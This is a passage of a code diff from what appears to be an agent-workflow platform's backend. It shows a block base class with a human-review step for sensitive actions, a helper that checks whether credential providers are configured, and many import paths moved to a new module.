test_credentials: Optional[Credentials | dict[str, Credentials]] = None,
disabled: bool = False,
static_output: bool = False,
block_type: BlockType = BlockType.STANDARD,
webhook_config: Optional[BlockWebhookConfig | BlockManualWebhookConfig] = None,
is_sensitive_action: bool = False,
):
"""
Initialize the block with the given schema.
Args:
id: The unique identifier for the block, this value will be persisted in the
DB. So it should be a unique and constant across the application run.
Use the UUID format for the ID.
description: The description of the block, explaining what the block does.
contributors: The list of contributors who contributed to the block.
input_schema: The schema, defined as a Pydantic model, for the input data.
output_schema: The schema, defined as a Pydantic model, for the output data.
test_input: The list or single sample input data for the block, for testing.
test_output: The list or single expected output if the test_input is run.
test_mock: function names on the block implementation to mock on test run.
disabled: If the block is disabled, it will not be available for execution.
static_output: Whether the output links of the block are static by default.
"""
from backend.data.model import NodeExecutionStats
self.id = id
self.input_schema = input_schema
self.output_schema = output_schema
self.test_input = test_input
self.test_output = test_output
self.test_mock = test_mock
self.test_credentials = test_credentials
self.description = description
self.categories = categories or set()
self.contributors = contributors or set()
self.disabled = disabled
self.static_output = static_output
self.block_type = block_type
self.webhook_config = webhook_config
self.is_sensitive_action = is_sensitive_action
self.execution_stats: "NodeExecutionStats" = NodeExecutionStats()
if self.webhook_config:
if isinstance(self.webhook_config, BlockWebhookConfig):
# Enforce presence of credentials field on auto-setup webhook blocks
if not (cred_fields := self.input_schema.get_credentials_fields()):
raise TypeError(
"credentials field is required on auto-setup webhook blocks"
)
# Disallow multiple credentials inputs on webhook blocks
elif len(cred_fields) > 1:
raise ValueError(
"Multiple credentials inputs not supported on webhook blocks"
)
self.block_type = BlockType.WEBHOOK
else:
self.block_type = BlockType.WEBHOOK_MANUAL
# Enforce shape of webhook event filter, if present
if self.webhook_config.event_filter_input:
event_filter_field = self.input_schema.model_fields[
self.webhook_config.event_filter_input
]
if not (
isinstance(event_filter_field.annotation, type)
and issubclass(event_filter_field.annotation, BaseModel)
and all(
field.annotation is bool
for field in event_filter_field.annotation.model_fields.values()
)
):
raise NotImplementedError(
f"{self.name} has an invalid webhook event selector: "
"field must be a BaseModel and all its fields must be boolean"
)
# Enforce presence of 'payload' input
if "payload" not in self.input_schema.model_fields:
raise TypeError(
f"{self.name} is webhook-triggered but has no 'payload' input"
)
# Disable webhook-triggered block if webhook functionality not available
if not app_config.platform_base_url:
self.disabled = True
@abstractmethod
async def run(self, input_data: BlockSchemaInputType, **kwargs) -> BlockOutput:
"""
Run the block with the given input data.
Args:
input_data: The input data with the structure of input_schema.
Kwargs: Currently 14/02/2025 these include
graph_id: The ID of the graph.
node_id: The ID of the node.
graph_exec_id: The ID of the graph execution.
node_exec_id: The ID of the node execution.
user_id: The ID of the user.
Returns:
A Generator that yields (output_name, output_data).
output_name: One of the output name defined in Block's output_schema.
output_data: The data for the output_name, matching the defined schema.
"""
# --- satisfy the type checker, never executed -------------
if False: # noqa: SIM115
yield "name", "value" # pyright: ignore[reportMissingYield]
raise NotImplementedError(f"{self.name} does not implement the run method.")
async def run_once(
self, input_data: BlockSchemaInputType, output: str, **kwargs
) -> Any:
async for item in self.run(input_data, **kwargs):
name, data = item
if name == output:
return data
raise ValueError(f"{self.name} did not produce any output for {output}")
def merge_stats(self, stats: "NodeExecutionStats") -> "NodeExecutionStats":
self.execution_stats += stats
return self.execution_stats
@property
def name(self):
return self.__class__.__name__
def to_dict(self):
return {
"id": self.id,
"name": self.name,
"inputSchema": self.input_schema.jsonschema(),
"outputSchema": self.output_schema.jsonschema(),
"description": self.description,
"categories": [category.dict() for category in self.categories],
"contributors": [
contributor.model_dump() for contributor in self.contributors
],
"staticOutput": self.static_output,
"uiType": self.block_type.value,
}
def get_info(self) -> BlockInfo:
from backend.data.credit import get_block_cost
return BlockInfo(
id=self.id,
name=self.name,
inputSchema=self.input_schema.jsonschema(),
outputSchema=self.output_schema.jsonschema(),
costs=get_block_cost(self),
description=self.description,
categories=[category.dict() for category in self.categories],
contributors=[
contributor.model_dump() for contributor in self.contributors
],
staticOutput=self.static_output,
uiType=self.block_type.value,
)
async def execute(self, input_data: BlockInput, **kwargs) -> BlockOutput:
try:
async for output_name, output_data in self._execute(input_data, **kwargs):
yield output_name, output_data
except Exception as ex:
if isinstance(ex, BlockError):
raise ex
else:
raise (
BlockExecutionError
if isinstance(ex, ValueError)
else BlockUnknownError
)(
message=str(ex),
block_name=self.name,
block_id=self.id,
) from ex
async def is_block_exec_need_review(
self,
input_data: BlockInput,
*,
user_id: str,
node_id: str,
node_exec_id: str,
graph_exec_id: str,
graph_id: str,
graph_version: int,
execution_context: "ExecutionContext",
**kwargs,
) -> tuple[bool, BlockInput]:
"""
Check if this block execution needs human review and handle the review process.
Returns:
Tuple of (should_pause, input_data_to_use)
- should_pause: True if execution should be paused for review
- input_data_to_use: The input data to use (may be modified by reviewer)
"""
if not (
self.is_sensitive_action and execution_context.sensitive_action_safe_mode
):
return False, input_data
from backend.blocks.helpers.review import HITLReviewHelper
# Handle the review request and get decision
decision = await HITLReviewHelper.handle_review_decision(
input_data=input_data,
user_id=user_id,
node_id=node_id,
node_exec_id=node_exec_id,
graph_exec_id=graph_exec_id,
graph_id=graph_id,
graph_version=graph_version,
block_name=self.name,
editable=True,
)
if decision is None:
# We're awaiting review - pause execution
return True, input_data
if not decision.should_proceed:
# Review was rejected, raise an error to stop execution
raise BlockExecutionError(
message=f"Block execution rejected by reviewer: {decision.message}",
block_name=self.name,
block_id=self.id,
)
# Review was approved - use the potentially modified data
# ReviewResult.data must be a dict for block inputs
reviewed_data = decision.review_result.data
if not isinstance(reviewed_data, dict):
raise BlockExecutionError(
message=f"Review data must be a dict for block input, got {type(reviewed_data).__name__}",
block_name=self.name,
block_id=self.id,
)
return False, reviewed_data
async def _execute(self, input_data: BlockInput, **kwargs) -> BlockOutput:
# Check for review requirement only if running within a graph execution context
# Direct block execution (e.g., from chat) skips the review process
has_graph_context = all(
key in kwargs
for key in (
"node_exec_id",
"graph_exec_id",
"graph_id",
"execution_context",
)
)
if has_graph_context:
should_pause, input_data = await self.is_block_exec_need_review(
input_data, **kwargs
)
if should_pause:
return
# Validate the input data (original or reviewer-modified) once
if error := self.input_schema.validate_data(input_data):
raise BlockInputError(
message=f"Unable to execute block with invalid input data: {error}",
block_name=self.name,
block_id=self.id,
)
# Use the validated input data
async for output_name, output_data in self.run(
self.input_schema(**{k: v for k, v in input_data.items() if v is not None}),
**kwargs,
):
if output_name == "error":
raise BlockExecutionError(
message=output_data, block_name=self.name, block_id=self.id
)
if self.block_type == BlockType.STANDARD and (
error := self.output_schema.validate_field(output_name, output_data)
):
raise BlockOutputError(
message=f"Block produced an invalid output data: {error}",
block_name=self.name,
block_id=self.id,
)
yield output_name, output_data
def is_triggered_by_event_type(
self, trigger_config: dict[str, Any], event_type: str
) -> bool:
if not self.webhook_config:
raise TypeError("This method can't be used on non-trigger blocks")
if not self.webhook_config.event_filter_input:
return True
event_filter = trigger_config.get(self.webhook_config.event_filter_input)
if not event_filter:
raise ValueError("Event filter is not configured on trigger")
return event_type in [
self.webhook_config.event_format.format(event=k)
for k in event_filter
if event_filter[k] is True
]
# Type alias for any block with standard input/output schemas
AnyBlockSchema: TypeAlias = Block[BlockSchemaInput, BlockSchemaOutput]

View File

@@ -0,0 +1,122 @@
import logging
import os
from backend.integrations.providers import ProviderName
from ._base import AnyBlockSchema
logger = logging.getLogger(__name__)
def is_block_auth_configured(
block_cls: type[AnyBlockSchema],
) -> bool:
"""
Check if a block has a valid authentication method configured at runtime.
For example if a block is an OAuth-only block and there env vars are not set,
do not show it in the UI.
"""
from backend.sdk.registry import AutoRegistry
# Create an instance to access input_schema
try:
block = block_cls()
except Exception as e:
# If we can't create a block instance, assume it's not OAuth-only
logger.error(f"Error creating block instance for {block_cls.__name__}: {e}")
return True
logger.debug(
f"Checking if block {block_cls.__name__} has a valid provider configured"
)
# Get all credential inputs from input schema
credential_inputs = block.input_schema.get_credentials_fields_info()
required_inputs = block.input_schema.get_required_fields()
if not credential_inputs:
logger.debug(
f"Block {block_cls.__name__} has no credential inputs - Treating as valid"
)
return True
# Check credential inputs
if len(required_inputs.intersection(credential_inputs.keys())) == 0:
logger.debug(
f"Block {block_cls.__name__} has only optional credential inputs"
" - will work without credentials configured"
)
# Check if the credential inputs for this block are correctly configured
for field_name, field_info in credential_inputs.items():
provider_names = field_info.provider
if not provider_names:
logger.warning(
f"Block {block_cls.__name__} "
f"has credential input '{field_name}' with no provider options"
" - Disabling"
)
return False
# If a field has multiple possible providers, each one needs to be usable to
# prevent breaking the UX
for _provider_name in provider_names:
provider_name = _provider_name.value
if provider_name in ProviderName.__members__.values():
logger.debug(
f"Block {block_cls.__name__} credential input '{field_name}' "
f"provider '{provider_name}' is part of the legacy provider system"
" - Treating as valid"
)
break
provider = AutoRegistry.get_provider(provider_name)
if not provider:
logger.warning(
f"Block {block_cls.__name__} credential input '{field_name}' "
f"refers to unknown provider '{provider_name}' - Disabling"
)
return False
# Check the provider's supported auth types
if field_info.supported_types != provider.supported_auth_types:
logger.warning(
f"Block {block_cls.__name__} credential input '{field_name}' "
f"has mismatched supported auth types (field <> Provider): "
f"{field_info.supported_types} != {provider.supported_auth_types}"
)
if not (supported_auth_types := provider.supported_auth_types):
# No auth methods are been configured for this provider
logger.warning(
f"Block {block_cls.__name__} credential input '{field_name}' "
f"provider '{provider_name}' "
"has no authentication methods configured - Disabling"
)
return False
# Check if provider supports OAuth
if "oauth2" in supported_auth_types:
# Check if OAuth environment variables are set
if (oauth_config := provider.oauth_config) and bool(
os.getenv(oauth_config.client_id_env_var)
and os.getenv(oauth_config.client_secret_env_var)
):
logger.debug(
f"Block {block_cls.__name__} credential input '{field_name}' "
f"provider '{provider_name}' is configured for OAuth"
)
else:
logger.error(
f"Block {block_cls.__name__} credential input '{field_name}' "
f"provider '{provider_name}' "
"is missing OAuth client ID or secret - Disabling"
)
return False
logger.debug(
f"Block {block_cls.__name__} credential input '{field_name}' is valid; "
f"supported credential types: {', '.join(field_info.supported_types)}"
)
return True

View File

@@ -1,7 +1,7 @@
import logging
from typing import Any, Optional
from typing import TYPE_CHECKING, Any, Optional
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockInput,
@@ -9,13 +9,15 @@ from backend.data.block import (
BlockSchema,
BlockSchemaInput,
BlockType,
get_block,
)
from backend.data.execution import ExecutionContext, ExecutionStatus, NodesInputMasks
from backend.data.model import NodeExecutionStats, SchemaField
from backend.util.json import validate_with_jsonschema
from backend.util.retry import func_retry
if TYPE_CHECKING:
from backend.executor.utils import LogMetadata
_logger = logging.getLogger(__name__)
@@ -124,9 +126,10 @@ class AgentExecutorBlock(Block):
graph_version: int,
graph_exec_id: str,
user_id: str,
logger,
logger: "LogMetadata",
) -> BlockOutput:
from backend.blocks import get_block
from backend.data.execution import ExecutionEventType
from backend.executor import utils as execution_utils
@@ -198,7 +201,7 @@ class AgentExecutorBlock(Block):
self,
graph_exec_id: str,
user_id: str,
logger,
logger: "LogMetadata",
) -> None:
from backend.executor import utils as execution_utils

View File

@@ -1,5 +1,11 @@
from typing import Any
from backend.blocks._base import (
BlockCategory,
BlockOutput,
BlockSchemaInput,
BlockSchemaOutput,
)
from backend.blocks.llm import (
DEFAULT_LLM_MODEL,
TEST_CREDENTIALS,
@@ -11,12 +17,6 @@ from backend.blocks.llm import (
LLMResponse,
llm_call,
)
from backend.data.block import (
BlockCategory,
BlockOutput,
BlockSchemaInput,
BlockSchemaOutput,
)
from backend.data.model import APIKeyCredentials, NodeExecutionStats, SchemaField

View File

@@ -6,7 +6,7 @@ from pydantic import SecretStr
from replicate.client import Client as ReplicateClient
from replicate.helpers import FileOutput
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -5,7 +5,12 @@ from pydantic import SecretStr
from replicate.client import Client as ReplicateClient
from replicate.helpers import FileOutput
from backend.data.block import Block, BlockCategory, BlockSchemaInput, BlockSchemaOutput
from backend.blocks._base import (
Block,
BlockCategory,
BlockSchemaInput,
BlockSchemaOutput,
)
from backend.data.execution import ExecutionContext
from backend.data.model import (
APIKeyCredentials,

View File

@@ -6,7 +6,7 @@ from typing import Literal
from pydantic import SecretStr
from replicate.client import Client as ReplicateClient
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -6,7 +6,7 @@ from typing import Literal
from pydantic import SecretStr
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -1,3 +1,10 @@
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,
BlockSchemaInput,
BlockSchemaOutput,
)
from backend.blocks.apollo._api import ApolloClient
from backend.blocks.apollo._auth import (
TEST_CREDENTIALS,
@@ -10,13 +17,6 @@ from backend.blocks.apollo.models import (
PrimaryPhone,
SearchOrganizationsRequest,
)
from backend.data.block import (
Block,
BlockCategory,
BlockOutput,
BlockSchemaInput,
BlockSchemaOutput,
)
from backend.data.model import CredentialsField, SchemaField

View File

@@ -1,5 +1,12 @@
import asyncio
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,
BlockSchemaInput,
BlockSchemaOutput,
)
from backend.blocks.apollo._api import ApolloClient
from backend.blocks.apollo._auth import (
TEST_CREDENTIALS,
@@ -14,13 +21,6 @@ from backend.blocks.apollo.models import (
SearchPeopleRequest,
SenorityLevels,
)
from backend.data.block import (
Block,
BlockCategory,
BlockOutput,
BlockSchemaInput,
BlockSchemaOutput,
)
from backend.data.model import CredentialsField, SchemaField

View File

@@ -1,3 +1,10 @@
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,
BlockSchemaInput,
BlockSchemaOutput,
)
from backend.blocks.apollo._api import ApolloClient
from backend.blocks.apollo._auth import (
TEST_CREDENTIALS,
@@ -6,13 +13,6 @@ from backend.blocks.apollo._auth import (
ApolloCredentialsInput,
)
from backend.blocks.apollo.models import Contact, EnrichPersonRequest
from backend.data.block import (
Block,
BlockCategory,
BlockOutput,
BlockSchemaInput,
BlockSchemaOutput,
)
from backend.data.model import CredentialsField, SchemaField

View File

@@ -3,7 +3,7 @@ from typing import Optional
from pydantic import BaseModel, Field
from backend.data.block import BlockSchemaInput
from backend.blocks._base import BlockSchemaInput
from backend.data.model import SchemaField, UserIntegrations
from backend.integrations.ayrshare import AyrshareClient
from backend.util.clients import get_database_manager_async_client

View File

@@ -1,7 +1,7 @@
import enum
from typing import Any
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -2,7 +2,7 @@ import os
import re
from typing import Type
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -1,7 +1,7 @@
from enum import Enum
from typing import Any
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -6,7 +6,7 @@ from typing import Literal, Optional
from e2b import AsyncSandbox as BaseAsyncSandbox
from pydantic import BaseModel, SecretStr
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -6,7 +6,7 @@ from e2b_code_interpreter import Result as E2BExecutionResult
from e2b_code_interpreter.charts import Chart as E2BExecutionResultChart
from pydantic import BaseModel, Field, JsonValue, SecretStr
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -1,6 +1,6 @@
import re
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -6,7 +6,7 @@ from openai import AsyncOpenAI
from openai.types.responses import Response as OpenAIResponse
from pydantic import SecretStr
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -1,6 +1,6 @@
from pydantic import BaseModel
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockManualWebhookConfig,

View File

@@ -1,4 +1,4 @@
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -1,6 +1,6 @@
from typing import Any, List
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -1,6 +1,6 @@
import codecs
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -8,7 +8,7 @@ from typing import Any, Literal, cast
import discord
from pydantic import SecretStr
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -2,7 +2,7 @@
Discord OAuth-based blocks.
"""
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -7,7 +7,7 @@ from typing import Literal
from pydantic import BaseModel, ConfigDict, SecretStr
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -2,7 +2,7 @@
import codecs
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -8,7 +8,7 @@ which provides access to LinkedIn profile data and related information.
import logging
from typing import Optional
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -3,6 +3,13 @@ import logging
from enum import Enum
from typing import Any
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,
BlockSchemaInput,
BlockSchemaOutput,
)
from backend.blocks.fal._auth import (
TEST_CREDENTIALS,
TEST_CREDENTIALS_INPUT,
@@ -10,13 +17,6 @@ from backend.blocks.fal._auth import (
FalCredentialsField,
FalCredentialsInput,
)
from backend.data.block import (
Block,
BlockCategory,
BlockOutput,
BlockSchemaInput,
BlockSchemaOutput,
)
from backend.data.execution import ExecutionContext
from backend.data.model import SchemaField
from backend.util.file import store_media_file

View File

@@ -5,7 +5,7 @@ from pydantic import SecretStr
from replicate.client import Client as ReplicateClient
from replicate.helpers import FileOutput
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -3,7 +3,7 @@ from typing import Optional
from pydantic import BaseModel
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -5,7 +5,7 @@ from typing import Optional
from typing_extensions import TypedDict
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -3,7 +3,7 @@ from urllib.parse import urlparse
from typing_extensions import TypedDict
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -2,7 +2,7 @@ import re
from typing_extensions import TypedDict
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -2,7 +2,7 @@ import base64
from typing_extensions import TypedDict
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -4,7 +4,7 @@ from typing import Any, List, Optional
from typing_extensions import TypedDict
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -3,7 +3,7 @@ from typing import Optional
from pydantic import BaseModel
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -4,7 +4,7 @@ from pathlib import Path
from pydantic import BaseModel
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -8,7 +8,7 @@ from google.oauth2.credentials import Credentials
from googleapiclient.discovery import build
from pydantic import BaseModel
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -7,14 +7,14 @@ from google.oauth2.credentials import Credentials
from googleapiclient.discovery import build
from gravitas_md2gdocs import to_requests
from backend.blocks.google._drive import GoogleDriveFile, GoogleDriveFileField
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,
BlockSchemaInput,
BlockSchemaOutput,
)
from backend.blocks.google._drive import GoogleDriveFile, GoogleDriveFileField
from backend.data.model import SchemaField
from backend.util.settings import Settings

View File

@@ -14,7 +14,7 @@ from google.oauth2.credentials import Credentials
from googleapiclient.discovery import build
from pydantic import BaseModel, Field
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -7,14 +7,14 @@ from enum import Enum
from google.oauth2.credentials import Credentials
from googleapiclient.discovery import build
from backend.blocks.google._drive import GoogleDriveFile, GoogleDriveFileField
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,
BlockSchemaInput,
BlockSchemaOutput,
)
from backend.blocks.google._drive import GoogleDriveFile, GoogleDriveFileField
from backend.data.model import SchemaField
from backend.util.settings import Settings

View File

@@ -3,7 +3,7 @@ from typing import Literal
import googlemaps
from pydantic import BaseModel, SecretStr
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -9,9 +9,7 @@ from typing import Any, Optional
from prisma.enums import ReviewStatus
from pydantic import BaseModel
from backend.data.execution import ExecutionStatus
from backend.data.human_review import ReviewResult
from backend.executor.manager import async_update_node_execution_status
from backend.util.clients import get_database_manager_async_client
logger = logging.getLogger(__name__)
@@ -43,6 +41,8 @@ class HITLReviewHelper:
@staticmethod
async def update_node_execution_status(**kwargs) -> None:
"""Update the execution status of a node."""
from backend.executor.manager import async_update_node_execution_status
await async_update_node_execution_status(
db_client=get_database_manager_async_client(), **kwargs
)
@@ -88,12 +88,13 @@ class HITLReviewHelper:
Raises:
Exception: If review creation or status update fails
"""
from backend.data.execution import ExecutionStatus
# Note: Safe mode checks (human_in_the_loop_safe_mode, sensitive_action_safe_mode)
# are handled by the caller:
# - HITL blocks check human_in_the_loop_safe_mode in their run() method
# - Sensitive action blocks check sensitive_action_safe_mode in is_block_exec_need_review()
# This function only handles checking for existing approvals.
# Check if this node has already been approved (normal or auto-approval)
if approval_result := await HITLReviewHelper.check_approval(
node_exec_id=node_exec_id,

View File

@@ -8,7 +8,7 @@ from typing import Literal
import aiofiles
from pydantic import SecretStr
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -1,15 +1,15 @@
from backend.blocks.hubspot._auth import (
HubSpotCredentials,
HubSpotCredentialsField,
HubSpotCredentialsInput,
)
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,
BlockSchemaInput,
BlockSchemaOutput,
)
from backend.blocks.hubspot._auth import (
HubSpotCredentials,
HubSpotCredentialsField,
HubSpotCredentialsInput,
)
from backend.data.model import SchemaField
from backend.util.request import Requests

View File

@@ -1,15 +1,15 @@
from backend.blocks.hubspot._auth import (
HubSpotCredentials,
HubSpotCredentialsField,
HubSpotCredentialsInput,
)
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,
BlockSchemaInput,
BlockSchemaOutput,
)
from backend.blocks.hubspot._auth import (
HubSpotCredentials,
HubSpotCredentialsField,
HubSpotCredentialsInput,
)
from backend.data.model import SchemaField
from backend.util.request import Requests

View File

@@ -1,17 +1,17 @@
from datetime import datetime, timedelta
from backend.blocks.hubspot._auth import (
HubSpotCredentials,
HubSpotCredentialsField,
HubSpotCredentialsInput,
)
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,
BlockSchemaInput,
BlockSchemaOutput,
)
from backend.blocks.hubspot._auth import (
HubSpotCredentials,
HubSpotCredentialsField,
HubSpotCredentialsInput,
)
from backend.data.model import SchemaField
from backend.util.request import Requests

View File

@@ -3,8 +3,7 @@ from typing import Any
from prisma.enums import ReviewStatus
from backend.blocks.helpers.review import HITLReviewHelper
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,
@@ -12,6 +11,7 @@ from backend.data.block import (
BlockSchemaOutput,
BlockType,
)
from backend.blocks.helpers.review import HITLReviewHelper
from backend.data.execution import ExecutionContext
from backend.data.human_review import ReviewResult
from backend.data.model import SchemaField

View File

@@ -3,7 +3,7 @@ from typing import Any, Dict, Literal, Optional
from pydantic import SecretStr
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -2,9 +2,7 @@ import copy
from datetime import date, time
from typing import Any, Optional
# Import for Google Drive file input block
from backend.blocks.google._drive import AttachmentView, GoogleDriveFile
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,
@@ -12,6 +10,9 @@ from backend.data.block import (
BlockSchemaInput,
BlockType,
)
# Import for Google Drive file input block
from backend.blocks.google._drive import AttachmentView, GoogleDriveFile
from backend.data.execution import ExecutionContext
from backend.data.model import SchemaField
from backend.util.file import store_media_file

View File

@@ -1,6 +1,6 @@
from typing import Any
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -1,15 +1,15 @@
from backend.blocks.jina._auth import (
JinaCredentials,
JinaCredentialsField,
JinaCredentialsInput,
)
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,
BlockSchemaInput,
BlockSchemaOutput,
)
from backend.blocks.jina._auth import (
JinaCredentials,
JinaCredentialsField,
JinaCredentialsInput,
)
from backend.data.model import SchemaField
from backend.util.request import Requests

View File

@@ -1,15 +1,15 @@
from backend.blocks.jina._auth import (
JinaCredentials,
JinaCredentialsField,
JinaCredentialsInput,
)
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,
BlockSchemaInput,
BlockSchemaOutput,
)
from backend.blocks.jina._auth import (
JinaCredentials,
JinaCredentialsField,
JinaCredentialsInput,
)
from backend.data.model import SchemaField
from backend.util.request import Requests

View File

@@ -3,18 +3,18 @@ from urllib.parse import quote
from typing_extensions import TypedDict
from backend.blocks.jina._auth import (
JinaCredentials,
JinaCredentialsField,
JinaCredentialsInput,
)
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,
BlockSchemaInput,
BlockSchemaOutput,
)
from backend.blocks.jina._auth import (
JinaCredentials,
JinaCredentialsField,
JinaCredentialsInput,
)
from backend.data.model import SchemaField
from backend.util.request import Requests

View File

@@ -1,5 +1,12 @@
from urllib.parse import quote
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,
BlockSchemaInput,
BlockSchemaOutput,
)
from backend.blocks.jina._auth import (
TEST_CREDENTIALS,
TEST_CREDENTIALS_INPUT,
@@ -8,13 +15,6 @@ from backend.blocks.jina._auth import (
JinaCredentialsInput,
)
from backend.blocks.search import GetRequest
from backend.data.block import (
Block,
BlockCategory,
BlockOutput,
BlockSchemaInput,
BlockSchemaOutput,
)
from backend.data.model import SchemaField
from backend.util.exceptions import BlockExecutionError

View File

@@ -15,7 +15,7 @@ from anthropic.types import ToolParam
from groq import AsyncGroq
from pydantic import BaseModel, SecretStr
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -2,7 +2,7 @@ import operator
from enum import Enum
from typing import Any
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -3,7 +3,7 @@ from typing import List, Literal
from pydantic import SecretStr
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -3,7 +3,7 @@ from typing import Any, Literal, Optional, Union
from mem0 import MemoryClient
from pydantic import BaseModel, SecretStr
from backend.data.block import Block, BlockOutput, BlockSchemaInput, BlockSchemaOutput
from backend.blocks._base import Block, BlockOutput, BlockSchemaInput, BlockSchemaOutput
from backend.data.model import (
APIKeyCredentials,
CredentialsField,

View File

@@ -4,7 +4,7 @@ from typing import Any, Dict, List, Optional
from pydantic import model_validator
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -2,7 +2,7 @@ from __future__ import annotations
from typing import Any, Dict, List, Optional
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -1,6 +1,6 @@
from __future__ import annotations
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -1,6 +1,6 @@
from __future__ import annotations
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -4,7 +4,7 @@ from typing import List, Optional
from pydantic import BaseModel
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,

View File

@@ -1,15 +1,15 @@
from backend.blocks.nvidia._auth import (
NvidiaCredentials,
NvidiaCredentialsField,
NvidiaCredentialsInput,
)
from backend.data.block import (
from backend.blocks._base import (
Block,
BlockCategory,
BlockOutput,
BlockSchemaInput,
BlockSchemaOutput,
)
from backend.blocks.nvidia._auth import (
NvidiaCredentials,
NvidiaCredentialsField,
NvidiaCredentialsInput,
)
from backend.data.model import SchemaField
from backend.util.request import Requests
from backend.util.type import MediaFileType

Some files were not shown because too many files have changed in this diff Show More